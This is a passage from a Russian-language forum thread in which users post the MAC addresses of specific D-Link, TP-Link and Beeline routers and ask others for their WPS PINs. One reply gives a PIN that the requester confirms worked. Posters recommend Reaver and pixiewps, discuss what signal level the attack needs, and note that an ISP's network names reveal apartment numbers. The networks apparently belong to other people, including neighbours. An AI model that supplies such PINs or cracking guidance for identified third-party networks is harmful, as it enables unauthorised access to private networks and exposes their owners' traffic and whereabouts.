23.05.2015, 21:33
DIR-620_C

90:94:E4:EE:E7:BC

Есть ПИН?



dlink хорошо подбирается ривером и pixiewps, этот еще и подсказали уже

Stalker5
23.05.2015, 21:49
Окей, попробую.

Vikhedgehog
23.05.2015, 22:31
Ну вообще бывает иногда что новые модели лочатся, например у кого-то из соседей был такой DIR-615, правда без пароля)

Anton91x
24.05.2015, 22:34
1708421



Пин подошел, большое спасибо

binarymaster
26.05.2015, 00:45
Вообщем вот что мне выдало, после атаки на одну из точек



Так и есть, сигнал слишком низкий.

Black3r
26.05.2015, 10:41
Так и есть, сигнал слишком низкий.



а какой уровень сигнала считается приемлимым для данной атаки?

TOX1C
26.05.2015, 13:09
Обычно -80 и ниже, причем точка должна слышать устройство приблизительно на таком же уровне. Но это сильно зависит от чипа в роутере и чипа в клиентском устройстве.

dt maxi
26.05.2015, 15:19
Пожалуйста помогите с подбором wps pin

Mac D4:21:22:32:1C:9A

Beeline smart box или

Mac 90:f6:52:99:AA:B6

Tl-WR1043ND

binarymaster
27.05.2015, 02:31
Про Onlime было?



Уже давно известный факт.

Число в ESSID - это номер квартиры.

Vovan71
27.05.2015, 11:00
Уже давно известный факт.

Число в ESSID - это номер квартиры.



Ну что же - баяню

Где то бы систематизировать бы все.

Удалил

Serge2000
27.05.2015, 14:56
Есть две сетки на TPlink-ах. WPS постоянно лочиться. Пробовал подбирать пин через GeneratorWPSPIN но не помогло. Может у кого-то будут еще варианты возможных пинов или тут все печально?

Точки:

Raketa E8:94:F6:4A:92:8A (TL_WR840N)

kyivstar68 E8:94:F6:CE:4C:E2 (TL_WR741ND)

henri2002
27.05.2015, 15:30
для туполинков нет известных алгоритмов генерации пина впс.